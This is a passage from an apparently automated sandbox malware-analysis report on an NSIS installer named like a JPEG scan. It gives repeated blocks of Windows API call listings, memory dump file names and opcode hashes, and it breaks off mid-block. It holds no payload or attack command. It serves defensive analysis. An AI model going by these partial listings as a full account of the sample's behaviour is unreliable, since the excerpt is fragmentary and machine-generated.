                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040613E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 717251189-730719616
                                  • Opcode ID: f8d53bdbd7d90d0ac424fe35c9312c39a263f382fe6c970e16e7b095edef69a6
                                  • Instruction ID: 60a0f59e8b6b1cd7b12ffa89f816090d794fd0a29963f433d7893304f5ec962b
                                  • Opcode Fuzzy Hash: f8d53bdbd7d90d0ac424fe35c9312c39a263f382fe6c970e16e7b095edef69a6
                                  • Instruction Fuzzy Hash: 9D61F171A00111AEDF219F24CC95BBB3BA5DB45300F16813BE943BA2D2C23C49A2CB5E
                                  APIs
                                  • GetWindowLongA.USER32(?,000000EB), ref: 0040408D
                                  • GetSysColor.USER32(00000000), ref: 004040CB
                                  • SetTextColor.GDI32(?,00000000), ref: 004040D7
                                  • SetBkMode.GDI32(?,?), ref: 004040E3
                                  • GetSysColor.USER32(?), ref: 004040F6
                                  • SetBkColor.GDI32(?,?), ref: 00404106
                                  • DeleteObject.GDI32(?), ref: 00404120
                                  • CreateBrushIndirect.GDI32(?), ref: 0040412A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
                                  • Instruction ID: dc807fd0e826fa60b9ec6720df696095df3ef071cd79e71149a0dd006d979902
                                  • Opcode Fuzzy Hash: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
                                  • Instruction Fuzzy Hash: D021B2709047059BCB309F28DC48A4BBBF8AF81715F048A2AFA96B62E0C334E844CB55
                                  APIs
                                  • lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                  • lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                  • lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
                                  • SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: fd1d901a3d66b42ab7b479128d65197b665bfaef9a3b2fba7657848ce050d806
                                  • Instruction ID: f15a229f4800e2d3be0f1ca7c95b874ac348c5f245d1a9f1eaef2b17b8141df3
                                  • Opcode Fuzzy Hash: fd1d901a3d66b42ab7b479128d65197b665bfaef9a3b2fba7657848ce050d806
                                  • Instruction Fuzzy Hash: 67217A71E00518BADF119FA5CD84ADFBFA9EB05354F14807AF904AA291C6789E418FA8
                                  APIs
                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404977
                                  • GetMessagePos.USER32 ref: 0040497F
                                  • ScreenToClient.USER32(?,?), ref: 00404999
                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049AB
                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                  • Instruction ID: 064635845699c0f4496499246dda67b20ede28c923f9f6f9e3dc5f389f782763
                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                  • Instruction Fuzzy Hash: 38015271D00219BADB01DBA4DD85BFFBBBCAF55711F10412BBA10B61C0D7B469018BA5
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
                                  • wsprintfA.USER32 ref: 00402CD2
                                  • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402CCC
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: d79d4c9ffce4257e89ee4afce4791c7f82385d7ff25413b105fc4450054c0f98
                                  • Instruction ID: 8c289f0fb36a9d27d262e5defce623c0a4e81db89a67886656150a2c4b5e1d8a
                                  • Opcode Fuzzy Hash: d79d4c9ffce4257e89ee4afce4791c7f82385d7ff25413b105fc4450054c0f98
                                  • Instruction Fuzzy Hash: 00014F70944208BBEF249F60DD09EEE37A9EB04704F008039FA06B92E0D7B99955CF59
                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 0040559A
                                  • GetLastError.KERNEL32 ref: 004055AE
                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055C3
                                  • GetLastError.KERNEL32 ref: 004055CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: ds@$ts@
                                  • API String ID: 3449924974-968229870
                                  • Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                  • Instruction ID: 3d8c07b43999b23b4b99d6b0442eda675a509ebc6c38f8f9f8ea4228a2b68225
                                  • Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                  • Instruction Fuzzy Hash: 0D010871C04259EAEF019BA1CC447EFBFB9EF04354F10817AD905B6290E378A604CBAA
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
                                  • wsprintfA.USER32 ref: 004062E4
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004062F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%s.dll$UXTHEME$\
                                  • API String ID: 2200240437-4240819195
                                  • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                  • Instruction ID: b350a7b34e5dfe1d1a07fade029f1484d0e2916aa38c44d12689a48c44b66a33
                                  • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                  • Instruction Fuzzy Hash: FAF0F63091410AAADF15AB74DC0DFFB365CAB08304F1405BAB646E11D2E6B8E9288B69
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                  • GlobalFree.KERNEL32(?), ref: 004027EB
                                  • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 86a8ee2d16782c07209517f5dd71efb1f290e7d8bca09d8e14a1676003343f95
                                  • Instruction ID: 69dabb1dc5664d4cb3e0aedb1da4cd8560a2ff3041f204a353ec2f52c38cd3f1
                                  • Opcode Fuzzy Hash: 86a8ee2d16782c07209517f5dd71efb1f290e7d8bca09d8e14a1676003343f95
                                  • Instruction Fuzzy Hash: 7C21BF71C00128BBCF206FA5CE49D9E7A79EF04364F14423AF410762E0C7791D009FA9
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 551687249-2449383134
                                  • Opcode ID: 83f174d6043497e4207e2511ffbbbcac1c17996e36d45ce9a5b1f59eccb8449a
                                  • Instruction ID: 5f1f0f90ab52480f624b15d228fda7616e1eaa7d5f1d5864c66c4d16daa58cb3
                                  • Opcode Fuzzy Hash: 83f174d6043497e4207e2511ffbbbcac1c17996e36d45ce9a5b1f59eccb8449a
                                  • Instruction Fuzzy Hash: 69518271901219ABCF10DF65DA4469F7BB8AB08756F14413BF910BB2C0C7389E51CBAA
                                  APIs
                                  • CharNextA.USER32(?,*?|<>/":,00000000,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
                                  • CharNextA.USER32(?,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
                                  • CharPrevA.USER32(?,?,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040624E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":
                                  • API String ID: 589700163-165019052
                                  • Opcode ID: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
                                  • Instruction ID: 78b5553556e1b29770c7274e4e8764cd0b55728b37568efcb800383df96c7a9c
                                  • Opcode Fuzzy Hash: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
                                  • Instruction Fuzzy Hash: FF11045180839029FB3226380C40BB76F994F6A760F1900BFE8D2722C2D67C5CA2976E
                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,004093E8,00429800,00000000,00000000,00000031), ref: 00401798
                                  • CompareFileTime.KERNEL32(-00000014,?,004093E8,004093E8,00000000,00000000,004093E8,00429800,00000000,00000000,00000031), ref: 004017C2
                                    • Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                    • Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
                                    • Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 1941528284-0
                                  • Opcode ID: 70cc27efd54403eebbad8668dea62bf760f27cf61ac3a9ca1c3910245f29406b
                                  • Instruction ID: ccd8e90e53bd547ce555faf0a88c0b4db7f619f01c1663a473e2e99c851a8e73
                                  • Opcode Fuzzy Hash: 70cc27efd54403eebbad8668dea62bf760f27cf61ac3a9ca1c3910245f29406b
                                  • Instruction Fuzzy Hash: D841A571A04516BECF107BB5CC45DAF76A8EF45369B20823BF521F20E1C77C8A418A6D
                                  APIs
                                  • GetDC.USER32(?), ref: 00401D9E
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                  • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                  • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E20
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID:
                                  • API String ID: 3808545654-0
                                  • Opcode ID: 55f869a5fda598a51216703b66032495b4875bc01aae277dd35d106919e713e4
                                  • Instruction ID: 85430ec79d7d493a62f5c90f0650e63f0d0faf8675fc45e27afe54df9b067c18
                                  • Opcode Fuzzy Hash: 55f869a5fda598a51216703b66032495b4875bc01aae277dd35d106919e713e4
                                  • Instruction Fuzzy Hash: CD019271948341AFE7009BB0AE49E9A7FB4DB55305F108479F101BB2E2CA7841909F2F
                                  APIs
                                  • GetDlgItem.USER32(?), ref: 00401D45
                                  • GetClientRect.USER32(00000000,?), ref: 00401D52
                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                  • DeleteObject.GDI32(00000000), ref: 00401D90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: ca1012e2c79ca43f41ba06613fdc3e207cf0b560d2e9a5361b5766506e6a226b
                                  • Instruction ID: 236c2df16a83e1707d8be159829b3a1190eecd98233effbe731bed35476ffb6f
                                  • Opcode Fuzzy Hash: ca1012e2c79ca43f41ba06613fdc3e207cf0b560d2e9a5361b5766506e6a226b
                                  • Instruction Fuzzy Hash: 01F0ECB2A04115BFDB01ABA4DE89DEFBBBCEB44305B044466F601F2191C6749D018B79
                                  APIs
                                  • lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
                                  • wsprintfA.USER32 ref: 004048F8
                                  • SetDlgItemTextA.USER32(?,0041FD08), ref: 0040490B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
